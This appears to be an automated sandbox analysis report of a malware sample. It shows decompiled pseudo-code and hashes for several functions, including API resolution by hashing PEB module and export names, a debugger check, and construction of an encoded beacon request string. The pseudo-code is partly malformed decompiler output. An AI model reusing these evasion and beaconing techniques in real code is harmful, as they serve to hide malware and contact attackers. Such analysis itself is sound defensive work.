                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D6620(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr* _t54;
				signed int _t56;
				signed int _t69;
				intOrPtr* _t70;
				signed char _t71;
				intOrPtr _t73;
				signed int _t77;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				signed int _t87;
				signed short _t91;
				signed int _t92;
				signed short* _t93;
				intOrPtr* _t95;

				_v20 = __ecx;
				_v24 = __edx;
				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t73 =  *((intOrPtr*)(_t70 + 0x18));
				_v8 = _t73;
				if(_t73 == 0) {
					L16:
					return 0;
				} else {
					do {
						_t49 =  *((intOrPtr*)(_t70 + 0x2c));
						_t93 =  *(_t70 + 0x30);
						_t70 =  *_t70;
						_v36 = _t49;
						_v28 = _t70;
						_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x3c)) + _t73 + 0x78));
						if(_t51 != 0) {
							_t91 =  *_t93 & 0x0000ffff;
							_t83 = _t51 + _t73;
							_v16 =  *((intOrPtr*)(_t83 + 0x18));
							_v32 = _t83;
							_t54 =  *((intOrPtr*)(_t83 + 0x20)) + _t73;
							_t84 = 0;
							_v12 = _t54;
							if(_t91 != 0) {
								do {
									_t93 =  &(_t93[1]);
									_t81 =  >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff;
									_t67 = ( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff;
									_t84 = _t84 * 0x00000101 + (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) ^ (( >=  ? _t91 & 0x0000ffff : _t91 + 0x00000020 & 0x0000ffff) & 0x0000ffff) << 0x00000010;
									_t69 =  *_t93 & 0x0000ffff;
									_t91 = _t69;
								} while (_t69 != 0);
								_t54 = _v12;
								_t73 = _v8;
							}
							if(_t84 == _v20) {
								_t85 = _v16;
								_t92 = 0;
								if(_t85 != 0) {
									do {
										_t95 =  *_t54 + _t73;
										_v12 = _t54 + 4;
										_t56 = 0;
										_t71 =  *_t95;
										if(_t71 != 0) {
											do {
												_t87 = _t71 + 0x00000020 & 0x000000ff;
												_t95 = _t95 + 1;
												_t77 = _t71 & 0x000000ff;
												_t71 =  *_t95;
												_t88 =  >=  ? _t77 : _t87;
												_t78 =  >=  ? _t77 : _t87;
												_t56 = _t56 * 0x00000101 + ( >=  ? _t77 : _t87) ^ ( >=  ? _t77 : _t87) << 0x00000010;
											} while (_t71 != 0);
											_t73 = _v8;
											_t85 = _v16;
										}
										if(_t56 == _v24) {
											return  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0x1c)) + ( *( *((intOrPtr*)(_v32 + 0x24)) + _t92 * 2 + _t73) & 0x0000ffff) * 4 + _v8)) + _v8;
										} else {
											goto L13;
										}
										goto L18;
										L13:
										_t54 = _v12;
										_t92 = _t92 + 1;
									} while (_t92 < _t85);
									_t70 = _v28;
								}
							}
						}
						goto L15;
						L15:
						_t73 =  *((intOrPtr*)(_t70 + 0x18));
						_v8 = _t73;
					} while (_t73 != 0);
					goto L16;
				}
				L18:
			}




























                                                                                                                                                                                                                                0x736d662d
                                                                                                                                                                                                                                0x736d6635
                                                                                                                                                                                                                                0x736d6638
                                                                                                                                                                                                                                0x736d663b
                                                                                                                                                                                                                                0x736d663e
                                                                                                                                                                                                                                0x736d6643
                                                                                                                                                                                                                                0x736d6731
                                                                                                                                                                                                                                0x736d6737
                                                                                                                                                                                                                                0x736d6650
                                                                                                                                                                                                                                0x736d6650
                                                                                                                                                                                                                                0x736d6650
                                                                                                                                                                                                                                0x736d6653
                                                                                                                                                                                                                                0x736d6656
                                                                                                                                                                                                                                0x736d6658
                                                                                                                                                                                                                                0x736d665e
                                                                                                                                                                                                                                0x736d6661
                                                                                                                                                                                                                                0x736d6667
                                                                                                                                                                                                                                0x736d666d
                                                                                                                                                                                                                                0x736d6670
                                                                                                                                                                                                                                0x736d6676
                                                                                                                                                                                                                                0x736d667c
                                                                                                                                                                                                                                0x736d667f
                                                                                                                                                                                                                                0x736d6681
                                                                                                                                                                                                                                0x736d6683
                                                                                                                                                                                                                                0x736d6689
                                                                                                                                                                                                                                0x736d6690
                                                                                                                                                                                                                                0x736d669a
                                                                                                                                                                                                                                0x736d66a0
                                                                                                                                                                                                                                0x736d66a9
                                                                                                                                                                                                                                0x736d66b1
                                                                                                                                                                                                                                0x736d66b3
                                                                                                                                                                                                                                0x736d66b6
                                                                                                                                                                                                                                0x736d66b8
                                                                                                                                                                                                                                0x736d66bd
                                                                                                                                                                                                                                0x736d66c0
                                                                                                                                                                                                                                0x736d66c0
                                                                                                                                                                                                                                0x736d66c6
                                                                                                                                                                                                                                0x736d66c8
                                                                                                                                                                                                                                0x736d66cb
                                                                                                                                                                                                                                0x736d66cf
                                                                                                                                                                                                                                0x736d66d1
                                                                                                                                                                                                                                0x736d66d6
                                                                                                                                                                                                                                0x736d66d8
                                                                                                                                                                                                                                0x736d66db
                                                                                                                                                                                                                                0x736d66dd
                                                                                                                                                                                                                                0x736d66e1
                                                                                                                                                                                                                                0x736d66e3
                                                                                                                                                                                                                                0x736d66e9
                                                                                                                                                                                                                                0x736d66ec
                                                                                                                                                                                                                                0x736d66ef
                                                                                                                                                                                                                                0x736d66f2
                                                                                                                                                                                                                                0x736d66f4
                                                                                                                                                                                                                                0x736d66fd
                                                                                                                                                                                                                                0x736d6705
                                                                                                                                                                                                                                0x736d6707
                                                                                                                                                                                                                                0x736d670b
                                                                                                                                                                                                                                0x736d670e
                                                                                                                                                                                                                                0x736d670e
                                                                                                                                                                                                                                0x736d6714
                                                                                                                                                                                                                                0x736d6759
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6716
                                                                                                                                                                                                                                0x736d6716
                                                                                                                                                                                                                                0x736d6719
                                                                                                                                                                                                                                0x736d671a
                                                                                                                                                                                                                                0x736d671e
                                                                                                                                                                                                                                0x736d671e
                                                                                                                                                                                                                                0x736d66cf
                                                                                                                                                                                                                                0x736d66c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6721
                                                                                                                                                                                                                                0x736d6721
                                                                                                                                                                                                                                0x736d6724
                                                                                                                                                                                                                                0x736d6727
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6650
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 0-254546324
                                                                                                                                                                                                                                • Opcode ID: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
                                                                                                                                                                                                                                • Instruction ID: 096cbccc9be851072f62721c72e6a35207eb330dd62d63e2f98fe4aa154a4062
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1c4d86223f696fbba127bb73baace05ee902a0359a7f9fe915c49917d7f71b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A419075B005198FDB08CF59C590AA9B7F2FF48310B5581AEDD86DB381DB34E941CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DBD8C, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DBD8C() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x736efae0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                                                                                                                                0x736dbd8c
                                                                                                                                                                                                                                0x736dbd94
                                                                                                                                                                                                                                0x736dbd9c

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: 8de22a111113112b989e267035d30f9215d60b857f210bd658361f7c2673790b
                                                                                                                                                                                                                                • Instruction ID: f26cf278488d723bed55618d9e5acc1a2efb0589758c7e644a3b2368a3ca7ffe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8de22a111113112b989e267035d30f9215d60b857f210bd658361f7c2673790b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BA00271541141CB57409F37850D30D359576455D27558555D409C9558EB6445545601
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8E8A8, Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5c7359a16d6e42bdc1a69f9e1eba68011afaa937c825d97cb989919233356839
                                                                                                                                                                                                                                • Instruction ID: 7bbf4a3866dcc082337cf91270bc49a75d336896604fb03777fe03c38b91db46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7359a16d6e42bdc1a69f9e1eba68011afaa937c825d97cb989919233356839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 432188349086A64BDF52EF7488926E6FFB0BE43A2078D41D9C8D149546E3109457C7C2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8E8FB, Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a523f35bea89bd8c9ea7c822a3038d770427d481f696069b6045cf1400170718
                                                                                                                                                                                                                                • Instruction ID: 77aea290955c7826e86e8a90b9719a5fa1305ac0b183a2ad1de29c497bdf9710
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a523f35bea89bd8c9ea7c822a3038d770427d481f696069b6045cf1400170718
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C22136395096A68BDB92FF78CCC26E2BBA0FE0272579C4199C890C9692E714D407DB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AF14, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                                                                                                			E00A8AF14(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00A8B07F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00A8B139(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00A8B024(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00A8B07F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00A8B11B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                                                                                                                0x00a8af18
                                                                                                                                                                                                                                0x00a8af19
                                                                                                                                                                                                                                0x00a8af1a
                                                                                                                                                                                                                                0x00a8af1d
                                                                                                                                                                                                                                0x00a8af1f
                                                                                                                                                                                                                                0x00a8af22
                                                                                                                                                                                                                                0x00a8af23
                                                                                                                                                                                                                                0x00a8af25
                                                                                                                                                                                                                                0x00a8af26
                                                                                                                                                                                                                                0x00a8af27
                                                                                                                                                                                                                                0x00a8af2a
                                                                                                                                                                                                                                0x00a8af34
                                                                                                                                                                                                                                0x00a8afe5
                                                                                                                                                                                                                                0x00a8afec
                                                                                                                                                                                                                                0x00a8aff5
                                                                                                                                                                                                                                0x00a8af3a
                                                                                                                                                                                                                                0x00a8af3a
                                                                                                                                                                                                                                0x00a8af40
                                                                                                                                                                                                                                0x00a8af46
                                                                                                                                                                                                                                0x00a8af49
                                                                                                                                                                                                                                0x00a8af4c
                                                                                                                                                                                                                                0x00a8af50
                                                                                                                                                                                                                                0x00a8af55
                                                                                                                                                                                                                                0x00a8af5a
                                                                                                                                                                                                                                0x00a8afda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af5c
                                                                                                                                                                                                                                0x00a8af5c
                                                                                                                                                                                                                                0x00a8af68
                                                                                                                                                                                                                                0x00a8af6a
                                                                                                                                                                                                                                0x00a8afc5
                                                                                                                                                                                                                                0x00a8afc5
                                                                                                                                                                                                                                0x00a8afcb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af6c
                                                                                                                                                                                                                                0x00a8af7b
                                                                                                                                                                                                                                0x00a8af7d
                                                                                                                                                                                                                                0x00a8af7e
                                                                                                                                                                                                                                0x00a8af7f
                                                                                                                                                                                                                                0x00a8af82
                                                                                                                                                                                                                                0x00a8af82
                                                                                                                                                                                                                                0x00a8af84
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8afd0
                                                                                                                                                                                                                                0x00a8af88
                                                                                                                                                                                                                                0x00a8af88
                                                                                                                                                                                                                                0x00a8af8c
                                                                                                                                                                                                                                0x00a8af94
                                                                                                                                                                                                                                0x00a8af99
                                                                                                                                                                                                                                0x00a8af9e
                                                                                                                                                                                                                                0x00a8afaa
                                                                                                                                                                                                                                0x00a8afb2
                                                                                                                                                                                                                                0x00a8afb9
                                                                                                                                                                                                                                0x00a8afbf
                                                                                                                                                                                                                                0x00a8afc3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8afc3
                                                                                                                                                                                                                                0x00a8af86
                                                                                                                                                                                                                                0x00a8af84
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8af6a
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8afde
                                                                                                                                                                                                                                0x00a8af5a
                                                                                                                                                                                                                                0x00a8affa
                                                                                                                                                                                                                                0x00a8b001

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                • Instruction ID: 5aff51eda23d4b19f511c0cfb6f6576f68a4ee91a15b8a52e3364bcbaf4a3512
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4121C8729002049FDB14FF68CCC59ABBBA5FF54350B058169EA568B245E730FD15CBE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9F85, Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D9F85(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E736DBAF4(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                                                                                                                                                                0x736d9f92
                                                                                                                                                                                                                                0x736d9f94
                                                                                                                                                                                                                                0x736d9f97
                                                                                                                                                                                                                                0x736d9f9a
                                                                                                                                                                                                                                0x736d9f9d
                                                                                                                                                                                                                                0x736d9fae
                                                                                                                                                                                                                                0x736d9fb0
                                                                                                                                                                                                                                0x736d9f9f
                                                                                                                                                                                                                                0x736d9fa3
                                                                                                                                                                                                                                0x736d9fac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9fac
                                                                                                                                                                                                                                0x736d9fb7

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
                                                                                                                                                                                                                                • Instruction ID: 7273a054672a6eece97baf6a3aedcd4b2ee88a1e72996d9f9a510948a64d63b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d99c6700238775ed74573daadd484035714786c77fdc3c5f2de5db595adc1e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E08C32A25228EBCB11CFCDC900E9AF3FCEB09A10B15019AF905D3240D6B1DE00C7C0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A870F4, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A870F4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xa8d018; // 0x9ad51634
				asm("bswap eax");
				_t61 =  *0xa8d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xa8d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xa8d00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0xa8d2e0; // 0x105a5a8
				_t3 = _t64 + 0xa8e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f878, _t63, _t62, _t61, _t60,  *0xa8d02c,  *0xa8d004, _t59);
				_t67 = E00A85C12();
				_t68 =  *0xa8d2e0; // 0x105a5a8
				_t4 = _t68 + 0xa8e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00A8508C(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xa8d2e0; // 0x105a5a8
					_t7 = _t126 + 0xa8e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xa8d270, 0, _v8);
				}
				_t73 = E00A86706();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xa8d2e0; // 0x105a5a8
					_t11 = _t121 + 0xa8e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xa8d270, 0, _v8);
				}
				_t146 =  *0xa8d364; // 0x1ae95b0
				_t75 = E00A86DFA(0xa8d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xa8d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xa8d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xa8d270, _t152, _v20);
						goto L26;
					}
					E00A8A425(GetTickCount());
					_t82 =  *0xa8d364; // 0x1ae95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xa8d364; // 0x1ae95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xa8d364; // 0x1ae95b0
					_t148 = E00A822AB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xa8d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xa8c2ac);
					_push(_t148);
					_t94 = E00A82629();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xa8d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00A83037( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00A8651D();
						L22:
						HeapFree( *0xa8d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00A8145F(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00A82EA6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00A853BB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00A81522(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00A853BB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                                                                                                                                0x00a870f4
